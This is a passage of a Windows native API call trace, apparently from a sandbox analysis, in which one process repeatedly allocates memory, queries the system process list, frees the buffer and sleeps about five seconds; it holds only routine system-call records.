SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.537] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.545] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.553] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.563] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.573] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.581] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.588] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.595] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.604] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.612] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.620] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.626] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.634] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.641] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.648] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.655] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.662] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.669] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.677] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.685] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.692] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 